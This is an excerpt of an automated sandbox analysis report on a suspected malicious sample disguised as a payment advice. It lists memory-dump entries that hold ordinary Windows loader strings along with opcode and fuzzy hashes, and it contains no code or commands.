                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                            • API String ID: 0-2986994758
                                                                                                                                            • Opcode ID: 88403f0679df76736c992b4814446ee0b7bcc1432e80a98a14ca28a9ab48260f
                                                                                                                                            • Instruction ID: 0f59c6f0240413020a8ec6b05e137aee8ef2acae7552836ab92687cd2723d3ce
                                                                                                                                            • Opcode Fuzzy Hash: 88403f0679df76736c992b4814446ee0b7bcc1432e80a98a14ca28a9ab48260f
                                                                                                                                            • Instruction Fuzzy Hash: 84F0C8756403186FEB24EA5CCC56F997768FB40B64F11005DF60567285D5B0E506CA51
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                            • String ID: #%u
                                                                                                                                            • API String ID: 48624451-232158463
                                                                                                                                            • Opcode ID: 5edaac619e97dfa1d2a744161f10e70309ba8ed8a67d588d8a5a7806d5c18d38
                                                                                                                                            • Instruction ID: 1b59d47d413dd5ac9e02498bce131076368322029e166b3c59a199258985daa2
                                                                                                                                            • Opcode Fuzzy Hash: 5edaac619e97dfa1d2a744161f10e70309ba8ed8a67d588d8a5a7806d5c18d38
                                                                                                                                            • Instruction Fuzzy Hash: 6D713D71A0124ADFDB11DF98CD94BAEBBF9BF08704F144069EA05E7251EA34ED41CB64
                                                                                                                                            Strings
                                                                                                                                            • LdrResSearchResource Exit, xrefs: 016AAA25
                                                                                                                                            • LdrResSearchResource Enter, xrefs: 016AAA13
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                                            • API String ID: 0-4066393604
                                                                                                                                            • Opcode ID: 0e929b7bd82854190cd0a40f3453758f90bb7fc7020c1680d5b3fb504f83647d
                                                                                                                                            • Instruction ID: bd54de8437b60ee0aebb9eec86809272274cb4b49e425496d87522978104c846
                                                                                                                                            • Opcode Fuzzy Hash: 0e929b7bd82854190cd0a40f3453758f90bb7fc7020c1680d5b3fb504f83647d
                                                                                                                                            • Instruction Fuzzy Hash: 44E15F71A00219DFEB22CED9CD94BAEBBBABB48350F50452AEA01E7291D7749D41CF50
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: `$`
                                                                                                                                            • API String ID: 0-197956300
                                                                                                                                            • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                            • Instruction ID: 4b7ae4ca18e423d6db4492957ebc36de2939c6dd412268e088d5b74266e20449
                                                                                                                                            • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                            • Instruction Fuzzy Hash: 52C1D3312043429BEB25CF28C845B6BFBE9AFD4314F184A2CFA96DB291D774D905CB51
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID: Legacy$UEFI
                                                                                                                                            • API String ID: 2994545307-634100481
                                                                                                                                            • Opcode ID: c9e5549f9eed4d59105831f86611aaa6a65004f8c7ea3b11189132c80b48143a
                                                                                                                                            • Instruction ID: 5e644f06a198166a52ea0cfdcb7dfe66cb3df682797702a3153f6fbeb1000e6a
                                                                                                                                            • Opcode Fuzzy Hash: c9e5549f9eed4d59105831f86611aaa6a65004f8c7ea3b11189132c80b48143a
                                                                                                                                            • Instruction Fuzzy Hash: A0614D71E402099FEB15DFACC840BAEFBB9FB48700F14406DEA49EB255DB31A940CB50
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: @$MUI
                                                                                                                                            • API String ID: 0-17815947
                                                                                                                                            • Opcode ID: 9dfa36464c085039bf5e8e3770055cf9908e00528eabe3c42e28a9f31a8d78ec
                                                                                                                                            • Instruction ID: 8d88f94090745ac0847766d47957fa9fb3bbb13176c938c704785e15e688d657
                                                                                                                                            • Opcode Fuzzy Hash: 9dfa36464c085039bf5e8e3770055cf9908e00528eabe3c42e28a9f31a8d78ec
                                                                                                                                            • Instruction Fuzzy Hash: FE5125B1E0021DAFDF11DFA9CC94BEEFBBEEB44654F100529E615A7280D7709A059BA0
                                                                                                                                            Strings
                                                                                                                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 016A063D
                                                                                                                                            • kLsE, xrefs: 016A0540
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                            • API String ID: 0-2547482624
                                                                                                                                            • Opcode ID: c6621b0a7f7ce1b6bb4afccfd182638ad8cb283e1e96be414660128571e45680
                                                                                                                                            • Instruction ID: 4b129b5e683bb308e14fa5b9bb8d60bd21959172eb84eb7f1ccb8a088ed68da4
                                                                                                                                            • Opcode Fuzzy Hash: c6621b0a7f7ce1b6bb4afccfd182638ad8cb283e1e96be414660128571e45680
                                                                                                                                            • Instruction Fuzzy Hash: 1E51BE715007428BD724DF68C9406A7BBE4AF85304F50983EF6DA87341E730E945CF96
                                                                                                                                            Strings
                                                                                                                                            • RtlpResUltimateFallbackInfo Enter, xrefs: 016AA2FB
                                                                                                                                            • RtlpResUltimateFallbackInfo Exit, xrefs: 016AA309
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                            • API String ID: 0-2876891731
                                                                                                                                            • Opcode ID: 6be8dcc3bc7e85370fac5cb1d14835b97b883154da4c18f16394d2c3a78885f4
                                                                                                                                            • Instruction ID: 193246512a9b23dcb7c948940b01f2227a2d8ad91c931e372df2b8a5c267db13
                                                                                                                                            • Opcode Fuzzy Hash: 6be8dcc3bc7e85370fac5cb1d14835b97b883154da4c18f16394d2c3a78885f4
                                                                                                                                            • Instruction Fuzzy Hash: DD419D31A04755DBDB12CF99C844B6ABBF5FF84704F2440AAE900DB392E7B5D941CB50
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID: Cleanup Group$Threadpool!
                                                                                                                                            • API String ID: 2994545307-4008356553
                                                                                                                                            • Opcode ID: d1f3cefbc2bedfa9aa3c12b8d559049e51935962f234f514ad6f15933f02bfb3
                                                                                                                                            • Instruction ID: 4996a2ca29da40e249ef43a1d9d6c710da8572146e43b33d4347cf3f434d35c4
                                                                                                                                            • Opcode Fuzzy Hash: d1f3cefbc2bedfa9aa3c12b8d559049e51935962f234f514ad6f15933f02bfb3
                                                                                                                                            • Instruction Fuzzy Hash: DF0121B2608780EFE311CF54CD05B2277E8E784725F00897DB208C7180E370D804CB8A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: MUI
                                                                                                                                            • API String ID: 0-1339004836
                                                                                                                                            • Opcode ID: 0ba8102166b9260dd45ec6e667856a4f867672a3329ed0269cf204badd0fd799
                                                                                                                                            • Instruction ID: 00cc96d8ac77d3293a2e1931c4d24ec236b30ee5f949d1cfb69e1f9f3741fc1d
                                                                                                                                            • Opcode Fuzzy Hash: 0ba8102166b9260dd45ec6e667856a4f867672a3329ed0269cf204badd0fd799
                                                                                                                                            • Instruction Fuzzy Hash: FB824875E002198FEB25CFA9C880BADBBB5FF48310F548169E959AB751D730AD82CF50
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 0-3916222277
                                                                                                                                            • Opcode ID: 889ad586bc972d31d06471b99a2c177cfde22ecd89d7b0740f5f5db5e5271ccc
                                                                                                                                            • Instruction ID: fdd56e922d6830fee5639cda1bbe0158cf57a4c15c17425514575a6314379edb
                                                                                                                                            • Opcode Fuzzy Hash: 889ad586bc972d31d06471b99a2c177cfde22ecd89d7b0740f5f5db5e5271ccc
                                                                                                                                            • Instruction Fuzzy Hash: E7918671900229AFDB21DF95CC85FEEBBB9EF14B50F104059F600AB191D774AD01CB64
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 0-3916222277
                                                                                                                                            • Opcode ID: 6d14c31a2e83d70d1d8bc9d96613ed55437134163e7ccc37ef10056fd1e2129f
                                                                                                                                            • Instruction ID: 9c59f03e8edcde45f8536bc7fba43bc519ac69fce6f3906ef64c8a57addf0b0f
                                                                                                                                            • Opcode Fuzzy Hash: 6d14c31a2e83d70d1d8bc9d96613ed55437134163e7ccc37ef10056fd1e2129f
                                                                                                                                            • Instruction Fuzzy Hash: 23917F32901609BBDB229BA5DC84FEFFBBAFF45760F100029F501A7250EB789941CB94
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: GlobalTags
                                                                                                                                            • API String ID: 0-1106856819
                                                                                                                                            • Opcode ID: f72aef39fe29b649dfd0a704e57a422918e3bf231d3f8867147a22507e48dfc4
                                                                                                                                            • Instruction ID: 6f949dce474cc9559272a5eb3429fbd1c0481f819b177cb1cf825b17113d29ae
                                                                                                                                            • Opcode Fuzzy Hash: f72aef39fe29b649dfd0a704e57a422918e3bf231d3f8867147a22507e48dfc4
                                                                                                                                            • Instruction Fuzzy Hash: 8F715CB5E0021ACFDF28CF9CD9906ADFBB2BF48710F14816EE905A7249E7B19941CB54
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: .mui
                                                                                                                                            • API String ID: 0-1199573805
                                                                                                                                            • Opcode ID: 9227e7037afddf32a018c19b3664dbc3fa9e4bfa173b84ee39d0d3dd094408bd
                                                                                                                                            • Instruction ID: 6bcecad59b5943a7919571fc26ee28cb1aa42e3e7e3b1a6ddce98cc354ca1ff7
                                                                                                                                            • Opcode Fuzzy Hash: 9227e7037afddf32a018c19b3664dbc3fa9e4bfa173b84ee39d0d3dd094408bd
                                                                                                                                            • Instruction Fuzzy Hash: 9A519172E0022ADBDF10DF99D840BAEFBB9AF04A54F05416DEA12BB250D7349D01DBA4
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: EXT-
                                                                                                                                            • API String ID: 0-1948896318
                                                                                                                                            • Opcode ID: fabf924706c777cb4e2c54e67e6b2013dd6e30d25da2ff51669e2a9dcd3bf0c6
                                                                                                                                            • Instruction ID: a9fe98c6d559c82351e99c85cfcd8fa08a4e7123667c384090c34937f1ebb8fa
                                                                                                                                            • Opcode Fuzzy Hash: fabf924706c777cb4e2c54e67e6b2013dd6e30d25da2ff51669e2a9dcd3bf0c6
                                                                                                                                            • Instruction Fuzzy Hash: 7641A172508312ABD711DA75CC80BEBB7E9AF88604F440A3DF685D7240E775D984C796
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: BinaryHash
                                                                                                                                            • API String ID: 0-2202222882
                                                                                                                                            • Opcode ID: 8b6437800b3f95d6625219efd9089d1e0ea97ad8f3ae95a356bfd90f1c4607f3
                                                                                                                                            • Instruction ID: 99247b3df9c7a46fc4c5bcce7df16ab740511ce2fb0fe7cbfa30df69bd0c98eb
                                                                                                                                            • Opcode Fuzzy Hash: 8b6437800b3f95d6625219efd9089d1e0ea97ad8f3ae95a356bfd90f1c4607f3
                                                                                                                                            • Instruction Fuzzy Hash: 474165B1D4112DAADB21DA94CC84FDEB77DAB44714F0045E9EB08AB144DB709E89CF98
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: #
                                                                                                                                            • API String ID: 0-1885708031
                                                                                                                                            • Opcode ID: f9e84d497bcc58139d579c59d29d6cb0a18d5c493620c45c4e9192d7bf3d9c42
                                                                                                                                            • Instruction ID: 3fa6f435986f84062fea7d9a64e24f5632ec6ce3d6a4dc334aa8835ae1ac46c4
                                                                                                                                            • Opcode Fuzzy Hash: f9e84d497bcc58139d579c59d29d6cb0a18d5c493620c45c4e9192d7bf3d9c42
                                                                                                                                            • Instruction Fuzzy Hash: 5B311A31A00719ABDB22DB69CC54BEEBBB9DF85704F14406CF9419B283C775EA05CB54
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: BinaryName
                                                                                                                                            • API String ID: 0-215506332
                                                                                                                                            • Opcode ID: f4282822bf2b74988733929ec84c69d8dfc0a46f65aa7ab51ea085885025c27d
                                                                                                                                            • Instruction ID: b313d976601a7e3116b0cc24003f8795fef53b371107be3f0b1ff5db11fd6f5d
                                                                                                                                            • Opcode Fuzzy Hash: f4282822bf2b74988733929ec84c69d8dfc0a46f65aa7ab51ea085885025c27d
                                                                                                                                            • Instruction Fuzzy Hash: C331E536A40519AFEB27DA9DC855E6FFB75FB80710F014169A905E7250D730AE04E7E0
                                                                                                                                            Strings
                                                                                                                                            • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0172895E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                                            • API String ID: 0-702105204
                                                                                                                                            • Opcode ID: 8d26da3184401909708ec9a6ddffc67c56bdd636fa5cb7262698cd291ea5a883
                                                                                                                                            • Instruction ID: 3653fd66e503260a25537992b51a18346621fd9d0df0b97abaa1f3cbb0fea929
                                                                                                                                            • Opcode Fuzzy Hash: 8d26da3184401909708ec9a6ddffc67c56bdd636fa5cb7262698cd291ea5a883
                                                                                                                                            • Instruction Fuzzy Hash: 2201F7723042319BEB256F5A9C84B6AFBA5EF81664F04006DF6C106551CB227C47C797
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: fc2be2e4ed252ea1616551d81189c4faca6545b05c781a26065d93aa95b5fea4
                                                                                                                                            • Instruction ID: 564fc65363220d0e41bb3d9542234badec0c8cf60c418d982f4a6b69ac28ae60
                                                                                                                                            • Opcode Fuzzy Hash: fc2be2e4ed252ea1616551d81189c4faca6545b05c781a26065d93aa95b5fea4
                                                                                                                                            • Instruction Fuzzy Hash: 8D42D2366083419BE725CF68D890A6FFBE9FF88700F08092DFA9297252D771D855CB52
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: a39131251d9cb4d2c51dc8695490027e8fcb81dd83025ff5ec07f221448d2e55
                                                                                                                                            • Instruction ID: 6dace6514ad210012ea452dddd508e90cf223c76fb98f92f243a3787ed287262
                                                                                                                                            • Opcode Fuzzy Hash: a39131251d9cb4d2c51dc8695490027e8fcb81dd83025ff5ec07f221448d2e55
                                                                                                                                            • Instruction Fuzzy Hash: 09425C75E102198FEB25CF69C881BADFBF6BF88300F148199E949EB242D7349985CF51
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: bf40ce8b80b73463f9af8e37e1d7159487c1bd07e93ea5301bc1648a05ff7583
                                                                                                                                            • Instruction ID: 371fa8faeef946b47419b2c9e2058b715f5504fb3d44185c9e774699ba629fce
                                                                                                                                            • Opcode Fuzzy Hash: bf40ce8b80b73463f9af8e37e1d7159487c1bd07e93ea5301bc1648a05ff7583
                                                                                                                                            • Instruction Fuzzy Hash: E432DB70A00755CBEB26CF69C8647BEFBF2BF84304F24411DE58A9B285D735A962CB50
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 86fc6658000a5ee15a7e4e81e3b9df340011489bc5d541bbe54eab2463c1d141
                                                                                                                                            • Instruction ID: 87a7b39d8e8ac6958fd589cdbfa5c1421057cbe067e6161f53dc22e3a77a3300
                                                                                                                                            • Opcode Fuzzy Hash: 86fc6658000a5ee15a7e4e81e3b9df340011489bc5d541bbe54eab2463c1d141
                                                                                                                                            • Instruction Fuzzy Hash: 7222E0742846618FEB25CF2DC094376FBF1AF44300F18849AE9978F286E335E452DB61
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 78188bf363067b8d67a932ce8c84413058fd749d0a05a6f787501657e6499a97
                                                                                                                                            • Instruction ID: 8aa3077f5d230b334aba27b3524297c351684349c52448118f46f6a0b4d88d70
                                                                                                                                            • Opcode Fuzzy Hash: 78188bf363067b8d67a932ce8c84413058fd749d0a05a6f787501657e6499a97
                                                                                                                                            • Instruction Fuzzy Hash: 9C327C71A05205CFDB26CF68C880AAABBF1FF48310F588569E956AB791D734EC41CF90
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                            • Instruction ID: 92969cfe471869ae3494c52cf11b40a7eac660e978d81fb9e14d0f9a2d9a737d
                                                                                                                                            • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                            • Instruction Fuzzy Hash: 81F16E75E0021A9BDB15DF99C990BBEBBF5EF48B10F04816DE905AB390EB34E941CB50
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 377baadbb25548597744970a6ca11d73437b2a8a1e8adacf7d72061a2fe629b0
                                                                                                                                            • Instruction ID: 0dc2569572a9d8f41787d78800b373163eaf957a07814658c68e8a40220a0ee4
                                                                                                                                            • Opcode Fuzzy Hash: 377baadbb25548597744970a6ca11d73437b2a8a1e8adacf7d72061a2fe629b0
                                                                                                                                            • Instruction Fuzzy Hash: 21D1E471E0061A8BDF05CF68C841AFEF7F5AFC8304F1882A9E555A7242D735EA06CB51
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: faf50ca2da1871160379221618bf86ed1a2f560269956039d71774488c671ade
                                                                                                                                            • Instruction ID: 35b209172ffab1ffcb5afdd33b1814e3a16253ae5e5b5d70c4cda8b625724135
                                                                                                                                            • Opcode Fuzzy Hash: faf50ca2da1871160379221618bf86ed1a2f560269956039d71774488c671ade
                                                                                                                                            • Instruction Fuzzy Hash: DEE16C71608342CFC715CF28C890A6ABBE1FF89314F498A6DE99587351EB31E945CF92
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 5e93f464241bfca17cd07ab536f5e0b23ac6c8f960ca9e7d065ad0758591354e
                                                                                                                                            • Instruction ID: 98f57cdb9270b97663a2e4e98c0febaf321dc0e64627fbb2f5606bcfd9c07660
                                                                                                                                            • Opcode Fuzzy Hash: 5e93f464241bfca17cd07ab536f5e0b23ac6c8f960ca9e7d065ad0758591354e
                                                                                                                                            • Instruction Fuzzy Hash: 06D10371A0021A9BDF14CF68CC90ABEB7ADBF55704F05422DEA12DF280E734E955CB60
                                                                                                                                            Memory Dump Source
